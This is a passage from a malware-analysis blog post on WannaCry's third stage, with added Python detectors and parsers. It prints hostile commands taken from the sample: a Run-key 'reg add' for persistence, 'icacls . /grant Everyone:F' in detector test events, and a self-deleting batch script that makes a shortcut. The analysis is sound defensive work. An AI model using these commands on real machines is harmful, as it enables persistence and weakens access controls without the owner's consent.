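    principal = after_grant[0].replace("(", "").replace(")", "") if after_grant else ""
    return "open_acl_cwd" if principal == "everyone:f" else None


def detect(events, window=WINDOW):
    """Alert when one parent process starts both children within `window`."""
    last_seen = {}  # parent id -> {behaviour: time last seen}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        kind = classify(ev["command_line"])
        if kind is None:
            continue
        hits = last_seen.setdefault(ev["parent_guid"], {})
        hits[kind] = datetime.fromisoformat(ev["time"])
        if len(hits) == 2 and max(hits.values()) - min(hits.values()) <= window:
            alerts.append({"parent_guid": ev["parent_guid"],
                           "parent_image": ev["parent_image"],
                           "time": ev["time"]})
            hits.clear()  # one alert per pair
    return alerts


# Constructed events (not real telemetry).
EVENTS = [
    # Same parent, one second apart: should alert.
    {"time": "2023-05-10T09:00:01", "parent_guid": "{P-1}",
     "parent_image": r"C:\Users\lab\Desktop\sample.exe",
     "command_line": "attrib +h ."},
    {"time": "2023-05-10T09:00:02", "parent_guid": "{P-1}",
     "parent_image": r"C:\Users\lab\Desktop\sample.exe",
     "command_line": "icacls . /grant Everyone:F /T /C /Q"},
    # Admin activity on explicit paths: neither command targets ".".
    {"time": "2023-05-10T09:05:00", "parent_guid": "{P-2}",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"icacls D:\share /grant Everyone:F /T"},
    {"time": "2023-05-10T09:05:03", "parent_guid": "{P-2}",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"attrib +h C:\temp\x.txt"},
    # Both behaviours, but hours apart: outside the window.
    {"time": "2023-05-10T09:10:00", "parent_guid": "{P-3}",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\attrib.exe" +H .'},
    {"time": "2023-05-10T11:30:00", "parent_guid": "{P-3}",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "icacls . /grant Everyone:(F) /T /C /Q"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```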

Then he resolves these APIs to use them dynamically:

figure 53

And then, he uses this code for encryption:



CryptAcquireContextA(&hProv, NULL,
"Microsoft Enhanced RSA and AES Cryptographic Provider",
PROV_RSA_AES,
CRYPT_VERIFYCONTEXT | CRYPT_SILENT); // These flags indicate that a new key container should not be created and that the function should operate silently, without displaying any user interface.

CryptImportKey(hProv, PUBLICKEYSTRUC, 1172, NULL, NULL, &HCRYPTKEY);

RSA2 PUBLIC KEY

----->[| PUBLICKEYSTRUC |]<------


//Final PUBLICKEYSTRUC OUTPUT After Using the Python script


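You can use this Python code to extract only the hex values from the memory dump:

import re

HEX_BYTE = re.compile(r'^[0-9A-Fa-f]{2}$')

def extract_hex_dump(hex_dump):
    hex_lines = []
    for line in hex_dump.split('\n'):
        row = []
        # Skip the address column, then take at most 16 byte tokens
        for token in line.split()[1:17]:
            if not HEX_BYTE.match(token):
                break  # reached the ASCII column on a short last line
            row.append(token)
        if row:
            hex_lines.append(' '.join(row))
    return '\n'.join(hex_lines)

# Example usage
memory_dump = '''
[MEMORY DUMP]
'''

hex_dump = extract_hex_dump(memory_dump)
print(hex_dump)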

And this Python script translates the RSA2 public key from hex to PEM (Privacy Enhanced Mail) format.

import binascii

# Input hex key
hex_key = """
[PUBLICKKEY IN HEX]
"""
# Remove all whitespace (spaces and line breaks) between the hex bytes
hex_key = "".join(hex_key.split())

# Convert hex to bytes
key_bytes = bytes.fromhex(hex_key)

# Encode bytes to base64 (without the trailing newline) and convert to string.
# The base64 body is the raw CryptoAPI key blob, not PKCS#1 DER.
key_data = binascii.b2a_base64(key_bytes, newline=False).decode("utf-8")

# Build output string, 64 characters per line
output = "-----BEGIN RSA PUBLIC KEY-----\n"
for i in range(0, len(key_data), 64):
    output += key_data[i:i+64] + "\n"
output += "-----END RSA PUBLIC KEY-----\n"

# Print output
print(output)
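The following is an added example, not code from the original article: it decodes the 20-byte BLOBHEADER + RSAPUBKEY that starts each of the two key blobs this article dumps from memory, which tells you the blob type (0x07 with magic RSA2 for the first, 0x06 with magic RSA1 for the second), the key size, and how many bytes of a dump belong to the key. The function and constant names are assumptions made for this example.

```python
import struct

# BLOBHEADER.bType values (see the WinCrypt.h excerpt quoted in this article)
BLOB_TYPES = {0x6: "PUBLICKEYBLOB", 0x7: "PRIVATEKEYBLOB"}
CALG_RSA_KEYX = 0x0000A400
HEADER_LEN = 20  # BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes)

# First 20 bytes of the two key blobs dumped in this article
FIRST_BLOB_HEADER = bytes.fromhex(
    "07 02 00 00 00 A4 00 00 52 53 41 32 00 08 00 00 01 00 01 00")
SECOND_BLOB_HEADER = bytes.fromhex(
    "06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 01 00 01 00")


def parse_rsa_blob_header(blob: bytes) -> dict:
    """Decode the little-endian BLOBHEADER + RSAPUBKEY at the start of a blob."""
    if len(blob) < HEADER_LEN:
        raise ValueError("need 20 bytes for BLOBHEADER + RSAPUBKEY")
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if magic not in (b"RSA1", b"RSA2"):
        raise ValueError(f"unexpected RSAPUBKEY magic {magic!r}")
    mod_len = bitlen // 8
    total = HEADER_LEN + mod_len  # public blob: header + modulus
    if magic == b"RSA2":
        # private blob also stores p, q, dP, dQ, qInv (half size each) and d
        total += 5 * (bitlen // 16) + mod_len
    return {
        "blob_type": BLOB_TYPES.get(b_type, f"0x{b_type:X}"),
        "version": b_version,
        "is_rsa_keyx": alg_id == CALG_RSA_KEYX,
        "magic": magic.decode("ascii"),
        "has_private_part": magic == b"RSA2",
        "bits": bitlen,
        "public_exponent": pubexp,
        "blob_len": total,
    }


def modulus(blob: bytes) -> int:
    """Return the modulus, stored little-endian right after the header."""
    info = parse_rsa_blob_header(blob)
    end = HEADER_LEN + info["bits"] // 8
    if len(blob) < end:
        raise ValueError("blob is truncated before the end of the modulus")
    return int.from_bytes(blob[HEADER_LEN:end], "little")


def trim_blob(dump: bytes) -> bytes:
    """Cut a dump that runs past the key down to exactly one blob."""
    need = parse_rsa_blob_header(dump)["blob_len"]
    if len(dump) < need:
        raise ValueError(f"dump has {len(dump)} bytes, blob needs {need}")
    return dump[:need]


if __name__ == "__main__":
    for label, hdr in (("first", FIRST_BLOB_HEADER),
                       ("second", SECOND_BLOB_HEADER)):
        print(label, parse_rsa_blob_header(hdr))
```

The computed `blob_len` is the number of bytes to keep when a memory dump continues past the end of the key.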

Then it opens a handle to the t.wnry file for reading:

CreateFileA("t.wnry", GENERIC_READ, NULL, OPEN_EXISTING, NULL, NULL );

Then it reads this data from t.wnry:

0249D020  1E 38 22 27 FD E6 7F 0C 5D E7 7E 3E 28 A7 AF FD  .8"'ýæ..]ç~>(§¯ý 

Then decrypt it with the RSA2 Public Key:

0249D020  BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6  ¾á..Òå±".Î!.ì±=æ  

Analyze the 3rd Stage

Creating a mutex with the name “MsWinZonesCacheCounterMutexA”.

Then it gets the SID:

SID stands for Security Identifier. It is a unique identifier that is used to represent a security principal such as a user, group, or computer in a Windows operating system. A SID is a string of characters that is typically represented as a series of numbers and letters.

For example, SID: S-1-5-21-4158778063-1250727167-3994265684-1001

  • S: This is the prefix that indicates that this is a SID.
  • 1: This indicates the revision level of the SID structure.
  • 5: This is the identifier authority value, which identifies the entity that issued the SID. In this case, the value of 5 indicates that the SID was issued by the Windows Security Identifier (SID) authority.
  • 21-4158778063-1250727167-3994265684: These are the sub-authorities, which are additional numeric values that are used to further identify the security principal. In this case, the sub-authorities identify the security principal as a user account with a relative identifier (RID) of 1001.
  • 1001: This is the RID value that uniquely identifies the security principal within its domain.

Putting it all together, the SID S-1-5-21-4158778063-1250727167-3994265684-1001 identifies a user account with a relative identifier of 1001 that was issued by the Windows Security Identifier (SID) authority.

Then it compares your SID to S-1-5-18:

Malware may search for the SID S-1-5-18 because it is associated with the "Local System" account, which has the highest level of privileges in the Windows operating system. Malware that is able to obtain access to the "Local System" account would have complete control over the system and would be able to perform a wide range of malicious activities, such as installing additional malware, modifying system settings, stealing sensitive information, and more.

Or it uses another technique: calling the GetUserName API and then comparing the output to “SYSTEM”:

The GetUserNameA function retrieves the name of the user associated with the current thread or process, depending on the flags that are passed to the function. If the function returns the string "SYSTEM", this indicates that the current thread or process is running in the context of the "Local System" account.

By checking whether the output of GetUserNameA is equal to "SYSTEM", malware can determine whether it is running in the context of the "Local System" account. If it is, the malware can use this access to perform a wide range of malicious activities without being detected by security software, just as I mentioned for the SID check above.
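The following is an added example, not code from the original article: it converts a SID between the binary form found in tokens and memory and the string form shown above, then splits it into the parts the article lists and flags the Local System SID. The function names are assumptions made for this example.

```python
import struct

LOCAL_SYSTEM = "S-1-5-18"  # the SID the article says the malware compares against
ARTICLE_SID = "S-1-5-21-4158778063-1250727167-3994265684-1001"


def sid_bytes_to_string(raw: bytes) -> str:
    """Binary layout: revision (1 byte), sub-authority count (1 byte),
    identifier authority (6 bytes, big-endian), then the sub-authorities
    (4 bytes each, little-endian)."""
    if len(raw) < 8:
        raise ValueError("SID is shorter than its 8-byte fixed part")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("length does not match the sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, 8)
    return "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])


def sid_string_to_bytes(sid: str) -> bytes:
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def describe(sid: str) -> dict:
    raw = sid_string_to_bytes(sid)  # also validates the string
    subs = struct.unpack_from(f"<{raw[1]}I", raw, 8)
    return {
        "revision": raw[0],
        # Identifier authority 5 is SECURITY_NT_AUTHORITY
        "authority": int.from_bytes(raw[2:8], "big"),
        "sub_authorities": list(subs),
        "rid": subs[-1] if subs else None,
        "is_local_system": sid == LOCAL_SYSTEM,
    }


if __name__ == "__main__":
    for sid in (ARTICLE_SID, LOCAL_SYSTEM):
        print(sid, sid_string_to_bytes(sid).hex(" "), describe(sid))
```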

Then it creates another mutex with the name “Global\\MsWinZonesCacheCounterMutexW0” or “Global\\MsWinZonesCacheCounterMutexA0”, depending on whether the CreateMutexA or the CreateMutexW API is called.

Then the malware uses this code to modify the security settings of a Windows kernel object, granting permissions to unauthorized users or processes. This could allow the malware to perform actions on the system that would normally be restricted, such as modifying system settings or executing code.

By granting access to the “Everyone” group, the malware can potentially gain access to resources or perform actions that would be otherwise restricted, even if the malware is running under a limited user account. This can make it more difficult for security software to detect or prevent the malware’s actions, and can increase the potential damage that the malware can cause.

  1. GetSecurityInfo(handle, SE_KERNEL_OBJECT, 0x4, 0, 0, &ppDacl, 0, &ppSecurityDescriptor); - This line is using the GetSecurityInfo function to retrieve the security descriptor of a kernel object. The handle parameter is a handle to the object, SE_KERNEL_OBJECT specifies that the object is a kernel object, and 0x4 indicates that the function should retrieve the discretionary access control list (DACL) of the security descriptor. The resulting DACL is stored in the ppDacl parameter, and the entire security descriptor is stored in the ppSecurityDescriptor parameter.
  2. pListOfExplicitEntries.grfAccessPermissions = 2031617; - This line is setting the access permissions for the new ACE (Access Control Entry) that will be added to the DACL. The value 2031617 represents a combination of read, write, and execute permissions.
  3. pListOfExplicitEntries.grfAccessMode = GRANT_ACCESS; - This line specifies that the new ACE should grant access to the specified trustee.
  4. memset(&pListOfExplicitEntries.grfInheritance, 0, 12); - This line is setting the inheritance flags for the new ACE. In this case, the memset function is being used to set the pListOfExplicitEntries.grfInheritance member to all zeroes, which means that the new ACE should not be inherited by child objects.
  5. pListOfExplicitEntries.Trustee.TrusteeForm = TRUSTEE_IS_NAME; - This line is setting the type of the trustee to a name.
  6. pListOfExplicitEntries.Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP; - This line is setting the type of the trustee to a well-known group.
  7. pListOfExplicitEntries.Trustee.ptstrName = aEveryone; - This line is setting the name of the trustee to "Everyone".
  8. SetEntriesInAclA(0x1, &pListOfExplicitEntries, ppDacl, &NewAcl); - This line is using the SetEntriesInAcl function to create a new access control list (ACL) that contains the new ACE. The resulting ACL is stored in the NewAcl parameter.
  9. SetSecurityInfo(handle, SE_KERNEL_OBJECT, 0x4, 0, 0, NewAcl, 0); - This line is using the SetSecurityInfo function to set the new security descriptor for the kernel object. The handle parameter is a handle to the object, SE_KERNEL_OBJECT specifies that the object is a kernel object, 0x4 indicates that the function should modify the DACL of the security descriptor, and NewAcl is the new DACL that was created in the previous step.

OK, I prefer using Chat-GPT so that I don’t spend a lot of time searching. I need to analyze all the code, so he’s a good helper. I’m also googling to check whether his info is right or not, so use it for help.

So, this code is adding a new access control entry (ACE) to the discretionary access control list (DACL) of a Windows kernel object. The new ACE grants read, write, and execute permissions to the “Everyone” group, and specifies that the ACE should not be inherited by child objects.
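The following is an added example, not code from the original article: it decodes the access mask 2031617 (0x1F0001) bit by bit, shows which EXPLICIT_ACCESS fields the 12-byte memset covers, and gives a triage check for an ACE that hands Everyone full access. It assumes the kernel object is the mutex created just before this call and a 32-bit process where every field is 4 bytes; the function names are made up for this example.

```python
# Standard access rights (bits 16-20 of an access mask)
STANDARD_RIGHTS = {
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}
# The low 16 bits are object-specific; for a mutex, bit 0 is MUTANT_QUERY_STATE
MUTEX_RIGHTS = {0x0001: "MUTANT_QUERY_STATE"}
MUTEX_ALL_ACCESS = 0x001F0001

# EXPLICIT_ACCESS_A field offsets in a 32-bit process (assumption: 4-byte fields)
EXPLICIT_ACCESS_32 = [
    ("grfAccessPermissions", 0),
    ("grfAccessMode", 4),
    ("grfInheritance", 8),
    ("Trustee.pMultipleTrustee", 12),
    ("Trustee.MultipleTrusteeOperation", 16),
    ("Trustee.TrusteeForm", 20),
    ("Trustee.TrusteeType", 24),
    ("Trustee.ptstrName", 28),
]


def decode_mutex_mask(mask: int) -> list:
    """Name every bit set in an access mask applied to a mutex object."""
    names, left = [], mask
    for table in (STANDARD_RIGHTS, MUTEX_RIGHTS):
        for bit, name in table.items():
            if mask & bit:
                names.append(name)
                left &= ~bit
    if left:
        names.append(f"UNKNOWN(0x{left:08X})")
    return names


def fields_covered(first_field: str, length: int) -> list:
    """Fields touched by memset(&ea.<first_field>, 0, length)."""
    start = next(off for name, off in EXPLICIT_ACCESS_32 if name == first_field)
    return [name for name, off in EXPLICIT_ACCESS_32
            if start <= off < start + length]


def grants_everyone_full_access(trustee: str, access_mode: str, mask: int) -> bool:
    """Triage check: an ACE that grants Everyone all mutex rights."""
    return (trustee.lower() == "everyone"
            and access_mode == "GRANT_ACCESS"
            and (mask & MUTEX_ALL_ACCESS) == MUTEX_ALL_ACCESS)


if __name__ == "__main__":
    mask = 2031617  # value assigned to grfAccessPermissions in the article
    print(hex(mask), decode_mutex_mask(mask))
    print(fields_covered("grfInheritance", 12))
    print(grants_everyone_full_access("Everyone", "GRANT_ACCESS", mask))
```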

Then it uses the encryption APIs:


/*
RSA PUBLICKKEYSTRUC: dumped from memory at 1000CF40, then converted to hex and to base64 with our earlier code.
*/
CryptAcquireContextW(&hProv, NULL,
    "Microsoft Enhanced RSA and AES Cryptographic Provider",
    PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
CryptImportKey(hProv, PUBLICKKEYSTRUC, 276, NULL, NULL, &HCRYPTKEY); // import the public key above into that provider
CryptGenKey(hProv, CALG_RSA_KEYX, CRYPT_EXPORTABLE|AT_KEYEXCHANGE, &exKey); // generate a new random key pair
CryptExportKey(exKey, NULL, PUBLICKEYBLOB, 0,&NewPUBLICKEYBLOB,276); // export the newly generated public key
CreateFileA("00000000.pky", GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // create the public key file
WriteFile(h, NewPUBLICKEYBLOB, 276, &len, NULL); // store the newly generated public key
CryptExportKey(exKey, NULL, PRIVATEKEYBLOB, 0,&PRIVATEKEYBLOB,276); // export the newly generated random private key
CryptGetKeyParam(exKey, KP_BLOCKLEN, &Plen,0x4,NULL); // get its block length
CryptEncrypt(exeKey, NULL, TRUE, NULL, PRIVATEKEYBLOB); // encrypt the private key
CreateFileA("00000000.eky", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // create the encrypted private key file
SetFilePointer(h, NULL, NULL, FILE_END); // seek to the end of the file, which is also its beginning at this point
WriteFile(h, Plen, 4, &len, NULL); // write the size of the encrypted key (1280) first
WriteFile(h, PRIVATEKEYBLOB, Plen, &len, NULL); // then write the encrypted private key

// Then the content of the public key file is read and passed to CryptImportKey

CryptGenRandom(hProv, 8, &random); // get 8 cryptographically random bytes
CreateFileA("00000000.res", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // create the res file
WriteFile(h, random, 136, &len, NULL); // put the random data into the res file

Here is the Chat-GPT answer for the 0x6 hex value of the third parameter of CryptExportKey:

But I’m always googling to verify his info, and here is a link to the WinCrypt.h library:

// exported key blob definitions
// certenrolld_begin -- *BLOB
#define SIMPLEBLOB 0x1
#define PUBLICKEYBLOB 0x6
#define PRIVATEKEYBLOB 0x7
#define PLAINTEXTKEYBLOB 0x8
#define OPAQUEKEYBLOB 0x9
#define PUBLICKEYBLOBEX 0xA
#define SYMMETRICWRAPKEYBLOB 0xB
#if (NTDDI_VERSION >= NTDDI_WS03)
#define KEYSTATEBLOB 0xC
#endif //(NTDDI_VERSION >= NTDDI_WS03)

so, 0x6 is PUBLICKEYBLOB, Let’s see Chat-GPT:

He is stupid, so I always say: Use Chat-GPT as a helper, not as a Teacher.

Here is the WannaCry RSA public key:

And here is the creation of the 00000000.pky file:

Then it writes to it the exported public key obtained from the CryptExportKey API, so it is random:

And here is the randomly generated public key that was exported to the file:

And here it creates the 00000000.eky encrypted private key file:

And here it writes the size of the encrypted key to the 00000000.eky file first:

And then it writes the encrypted private key:

Then it imports the public key from the file:

And here are the main 5 threads of the malware:

The 1st thread creates the 00000000.res file:

Then it puts the data obtained from the CryptGenKey API into the res file:

And here is the content of the res file:

It is a loop that waits 25 seconds and then puts the current time into the res file.

We will see later why it is used.

The 2nd thread is related to the 00000000.dky file.

Again, it executes this function every 5 seconds:

If the file 00000000.dky does not exist, it comes back after 5 seconds and checks again whether it exists:

Then it runs the taskdl.exe file as a process:

And here is the Main function of the taskdl.exe:

It first calls the GetLogicalDrives function to retrieve a bitmask of all currently available logical drives. Then it loops through each drive letter (starting from 'Z' and going backward to 'C') and checks if that drive is available (by checking the corresponding bit in the LogicalDrives bitmask) and if it is not a CD-ROM drive (by calling GetDriveTypeW with the drive letter).

From Z down to C, not to A.

And here it appends $RECYCLE to the drive:

For example, if it found the D:\\ drive, the output will be: D:\$RECYCLE

Or it just gets the Temp path, like C:\Users\User\AppData\Local\Temp\

Then it appends *.WNCRYT to that path:

D:\$RECYCLE\*.WNCRYT

Here D: is your drive, $RECYCLE was added, and *.WNCRYT was also added, so I think it will take files of all extensions and add .WNCRYT, that’s why he added *. We know he does it, but let’s see how.

Or it appends it to the Temp path:

C:\Users\User\AppData\Local\Temp\*.WNCRYT

And here it tries to find all files with the .WNCRYT extension. We would have to analyze this later because we don’t have such a file, or we can make a file in the Temp folder with the .WNCRYT extension.

I created a WNCRYT file; let’s run the malware again:

And here, it found our file:

It does some manipulation and then deletes it:

Let’s say it’s a deletion program for all files with the WNCRYT extension.

Then it runs the Taskse.exe file as a process in the last thread.

Here is the main function of the last thread, which gets the C2 servers from the c.wnry file, then runs taskse.exe as the @WanaDecryptor@.exe process, and then runs a command.

It first creates a process with the command line @WanaDecryptor@.exe, if this file exists. So it needs to create this file first to run this process.

Here is the loop body for this thread, which gets the file path of the “tasksche.exe” file and then runs the command.

It runs this command:

cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f

where the registry key is the Run key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Here is the random name derived from the machine name:

And here is the final result of the command line:

which will be:

cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xvggyhfuuf622" /t REG_SZ /d "\"C:\Users\User\Desktop\tasksche.exe\"" /f

Registry Run key, random name from the computer name, and the path of the tasksche.exe file.

What does it do?

  • cmd.exe is the command interpreter for the Windows operating system.
  • /c is a switch that specifies that the command to be executed is contained within quotation marks.
  • reg is the command used to manage the registry in Windows.
  • add is the sub-command used to add a new entry to the registry.
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run specifies the location in the registry where the new entry will be added. This location is where Windows looks for programs to run at startup.
  • /v "xvggyhfuuf622" specifies the name of the new entry to be added to the registry. This can be any unique name you choose.
  • /t REG_SZ specifies the data type of the value to be added to the registry. In this case, it is a string value.
  • /d "\"C:\Users\User\Desktop\tasksche.exe\"" specifies the data that will be added to the registry. In this case, it is the path to the executable file that will be run at startup. The backslashes are used to escape the quotes around the file path.
  • /f is a switch that specifies that the command should be executed without prompting for confirmation.

So, this file will be run automatically under the name “xvggyhfuuf622”, which was derived from the computer name, through the Run key “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”.
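The following is an added example, not code from the original article: detection logic that parses process command lines for the `reg add ... \CurrentVersion\Run` pattern described above and reports the value name, the autostart target, and why the entry looks suspicious. The log lines are constructed samples, and the "generated name" pattern is an assumption based only on the single value name shown in this article.

```python
import re

# reg add <key> /v "<name>" /t <type> /d "<data>" /f, as in the command above
REG_ADD = re.compile(
    r'\breg(?:\.exe)?\s+add\s+(?P<key>"[^"]+"|\S+).*?'
    r'/v\s+"?(?P<name>[^"/]+?)"?\s+/t\s+(?P<type>\w+)\s+'
    r'/d\s+"(?P<data>(?:\\"|[^"])*)"', re.I)
RUN_KEY = re.compile(
    r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$', re.I)
USER_WRITABLE = re.compile(
    r'\\(?:Users\\[^\\]+\\(?:Desktop|Downloads|AppData)|ProgramData|Windows\\Temp)\\',
    re.I)
# Assumption from the one sample name in the article: lowercase letters, then digits
GENERATED_NAME = re.compile(r'[a-z]{6,}\d{1,4}')

# Constructed sample command lines (the first is the one shown in the article)
SAMPLES = [
    r'cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
    r'/v "xvggyhfuuf622" /t REG_SZ /d "\"C:\Users\User\Desktop\tasksche.exe\"" /f',
    r'reg add HKLM\SOFTWARE\Contoso\App /v Version /t REG_SZ /d "1.2" /f',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "OneDrive" '
    r'/t REG_SZ /d "\"C:\Program Files\Microsoft OneDrive\OneDrive.exe\" /background" /f',
]


def analyze(cmdline: str):
    """Return details of a Run-key write, or None if the line is not one."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    key = m.group("key").strip('"')
    if not RUN_KEY.search(key):
        return None
    data = m.group("data")
    quoted = re.match(r'\\"(.+?)\\"', data)  # target wrapped in escaped quotes
    target = quoted.group(1) if quoted else data.split(" ")[0]
    reasons = []
    if USER_WRITABLE.search(target):
        reasons.append("autostart target is in a user-writable directory")
    if GENERATED_NAME.fullmatch(m.group("name")):
        reasons.append("value name looks machine-generated")
    return {"key": key, "name": m.group("name"),
            "target": target, "reasons": reasons}


def scan(lines):
    """Keep only Run-key writes that triggered at least one reason."""
    hits = (analyze(line) for line in lines)
    return [h for h in hits if h and h["reasons"]]


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```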

And here it runs this command with the CreateProcessA API:

Then it tries to run the following, which was saved in a random bat file:

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\User\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "C:\Users\User\Desktop\@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs

del /a %0

And run this bat file:

Let’s see how the @WannaDecryptor@.exe file was created:

LOADING…
